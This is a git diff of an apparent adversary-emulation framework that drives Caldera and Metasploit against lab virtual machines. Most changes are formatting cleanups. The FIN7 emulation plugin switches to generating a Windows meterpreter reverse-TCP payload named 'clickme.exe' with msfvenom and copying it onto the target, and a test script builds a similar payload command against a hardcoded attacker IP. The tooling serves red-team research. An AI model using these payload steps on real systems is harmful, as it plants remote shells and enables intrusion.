diff --git a/app/calderacontrol.py b/app/calderacontrol.py index 062191b..1e57c0e 100644 --- a/app/calderacontrol.py +++ b/app/calderacontrol.py @@ -587,7 +587,7 @@ class CalderaControl(): # ######## All inclusive methods - def attack(self, attack_logger: AttackLog = None, paw="kickme", ability_id="bd527b63-9f9e-46e0-9816-b8434d2b8989", group="red", target_platform=None, parameters = None): + def attack(self, attack_logger: AttackLog = None, paw="kickme", ability_id="bd527b63-9f9e-46e0-9816-b8434d2b8989", group="red", target_platform=None, parameters=None): """ Attacks a system and returns results @param attack_logger: An attack logger class to log attacks with @@ -689,7 +689,7 @@ class CalderaControl(): self.attack_logger.vprint(f"{CommandlineColors.BACKGROUND_GREEN} Output: {outp} {CommandlineColors.ENDC}", 2) pprint(output) - self.attack_logger.vprint(self.list_facts_for_name("source_"+operation_name), 2) + self.attack_logger.vprint(self.list_facts_for_name("source_" + operation_name), 2) # ######## Cleanup self.execute_operation(opid, "cleanup") diff --git a/app/config.py b/app/config.py index 168d972..e8151a5 100644 --- a/app/config.py +++ b/app/config.py @@ -204,7 +204,7 @@ class ExperimentConfig(): try: res = self.raw_config["kali_conf"][attack] - except KeyError as exception: + except KeyError: res = {} if res is None: res = {} diff --git a/app/experimentcontrol.py b/app/experimentcontrol.py index 5f7bf11..1f785ea 100644 --- a/app/experimentcontrol.py +++ b/app/experimentcontrol.py @@ -119,11 +119,11 @@ class Experiment(): self.attack_logger.vprint(f"Attacking machine with PAW: {target_1.get_paw()} with {attack}", 2) it_worked = self.caldera_control.attack(attack_logger=self.attack_logger, - paw=target_1.get_paw(), - ability_id=attack, - group=target_1.get_group(), - target_platform=target_1.get_os() - ) + paw=target_1.get_paw(), + ability_id=attack, + group=target_1.get_group(), + target_platform=target_1.get_os() + ) # Moved to fix section below. If fix works: can be removed # print(f"Pausing before next attack (config: nap_time): {self.experiment_config.get_nap_time()}") diff --git a/app/metasploit.py b/app/metasploit.py index a468868..af98e10 100644 --- a/app/metasploit.py +++ b/app/metasploit.py @@ -3,8 +3,6 @@ from pymetasploit3.msfrpc import MsfRpcClient from app.machinecontrol import Machine - - # https://github.com/DanMcInerney/pymetasploit3 # Requirements @@ -80,8 +78,6 @@ class MSFVenom(): if outfile is not None: cmd += f" -o {outfile}" - - # -p payload linux/x86/meterpreter_reverse_tcp # -f format: elf, exe, powershell, python # --platform: linux, windows, osx @@ -120,4 +116,3 @@ class MSFVenom(): cmd = self.generate_cmd(**kwargs) self.attacker.remote_run(cmd) - diff --git a/caldera_control.py b/caldera_control.py index 8dab345..fd9474a 100644 --- a/caldera_control.py +++ b/caldera_control.py @@ -31,7 +31,6 @@ def list_facts(calcontrol, arguments): # pylint: disable=unused-argument @param arguments: Parser command line arguments """ - printme = "No found" if arguments.name: diff --git a/metasploit_control.py b/metasploit_control.py index 9828903..7a41ee5 100644 --- a/metasploit_control.py +++ b/metasploit_control.py @@ -4,8 +4,7 @@ from app.metasploit import MSFVenom, Metasploit # For some local tests -if __name__=="__main__": - +if __name__ == "__main__": # msfrpcd -S -P password -u user -f attacker_ip = "192.168.178.125" @@ -17,16 +16,6 @@ if __name__=="__main__": attack_logger = AttackLog(0) attacker = Machine({"root": "systems/attacker1", - "os": "linux", - "vm_controller": { - "type": "vagrant", - "vagrantfilepath": "systems", - "ip": attacker_ip - }, - "vm_name": "attacker1"}, attack_logger) - - # Target machine is attacker machine here - target = Machine({"root": "systems/attacker1", "os": "linux", "vm_controller": { "type": "vagrant", @@ -35,6 +24,16 @@ if __name__=="__main__": }, "vm_name": "attacker1"}, attack_logger) + # Target machine is attacker machine here + target = Machine({"root": "systems/attacker1", + "os": "linux", + "vm_controller": { + "type": "vagrant", + "vagrantfilepath": "systems", + "ip": attacker_ip + }, + "vm_name": "attacker1"}, attack_logger) + venom = MSFVenom(attacker, target) print(venom.generate_cmd(payload="linux/x64/meterpreter_reverse_tcp", architecture="x64", @@ -44,4 +43,4 @@ if __name__=="__main__": outfile="clickme.exe")) metasploit = Metasploit(password, server=attacker.get_ip(), username=user) - # client = MsfRpcClient('yourpassword', ssl=True) \ No newline at end of file + # client = MsfRpcClient('yourpassword', ssl=True) diff --git a/plugins/base/machinery.py b/plugins/base/machinery.py index 66716f5..060ab25 100644 --- a/plugins/base/machinery.py +++ b/plugins/base/machinery.py @@ -125,11 +125,11 @@ class MachineryPlugin(BasePlugin): """ The path external to the vm where specific data is stored """ return os.path.join(self.config.vagrantfilepath(), self.config.machinepath()) - ############### # This is the interface from the main code to the plugin system. Do not touch def __call_halt__(self): """ Wrapper around halt """ + self.vprint(f"{CommandlineColors.OKBLUE}Stopping machine: {self.config.vmname()} {CommandlineColors.ENDC}", 1) self.halt() self.vprint(f"{CommandlineColors.OKGREEN}Machine stopped: {self.config.vmname()}{CommandlineColors.ENDC}", 1) diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py index 24b454f..96d39c3 100644 --- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py +++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py @@ -8,7 +8,6 @@ from app.metasploit import MSFVenom import os - class FIN7Plugin(AttackPlugin): # Boilerplate @@ -34,7 +33,6 @@ class FIN7Plugin(AttackPlugin): # winword.exe spawns verclsid.exe # mshta uses taskschd.dll to create a task in 5 minutes - self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}End Step 1: Initial Breach{CommandlineColors.ENDC}", 1) def step2(self): @@ -70,7 +68,7 @@ class FIN7Plugin(AttackPlugin): # TODO: query computername https://attack.mitre.org/techniques/T1082/ # self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}query COMPUTERNAME env{CommandlineColors.ENDC}", 1) - #self.caldera_attack(self.targets[0], "c0da588f-79f0-4263-8998-7496b1a40596") + # self.caldera_attack(self.targets[0], "c0da588f-79f0-4263-8998-7496b1a40596") # TODO: load adsldp.dll and call dllGetClassObject() for the Windows Script Host ADSystemInfo Object COM object https://attack.mitre.org/techniques/T1082/ # WMI query for System Network Configuration discovery https://attack.mitre.org/techniques/T1016/ @@ -100,12 +98,12 @@ class FIN7Plugin(AttackPlugin): payload_name = "clickme.exe" venom = MSFVenom(self.attacker_machine_plugin, self.targets[0]) - venom.generate_payload(payload="linux/x64/meterpreter_reverse_tcp", - architecture="x64", - platform="linux", - # lhost, - format="elf", - outfile=payload_name) + venom.generate_payload(payload="windows/x64/meterpreter_reverse_tcp", + architecture="x64", + platform="windows", + # lhost, + format="exe", + outfile=payload_name) self.attacker_machine_plugin.get(payload_name, self.targets[0].get_machine_path_external()) src = os.path.join(self.targets[0].get_machine_path_external(), payload_name) self.targets[0].put(src, self.targets[0].get_playground()) diff --git a/tests/test_calderacontrol.py b/tests/test_calderacontrol.py index c9c884e..6ed03b8 100644 --- a/tests/test_calderacontrol.py +++ b/tests/test_calderacontrol.py @@ -273,18 +273,18 @@ class TestExample(unittest.TestCase): "name": "source_name" } exp3 = {"index": "operations", - "name": name, - "state": state, - "autonomous": 1, - 'obfuscator': 'plain-text', - 'auto_close': '1', - 'jitter': '4/8', - 'source': 'source_test_name', - 'visibility': '50', - "group": group, - "planner": "atomic", - "adversary_id": advid, - } + "name": name, + "state": state, + "autonomous": 1, + 'obfuscator': 'plain-text', + 'auto_close': '1', + 'jitter': '4/8', + 'source': 'source_test_name', + 'visibility': '50', + "group": group, + "planner": "atomic", + "adversary_id": advid, + } with patch.object(self.cc, "__contact_server__", return_value=None) as mock_method: self.cc.add_operation(name, advid, group, state) # mock_method.assert_called_once_with(exp, method="put") @@ -300,7 +300,7 @@ class TestExample(unittest.TestCase): "rules": [], "relationships": [], "facts": [] - } + } exp2 = {"index": "sources", "name": "source_name" }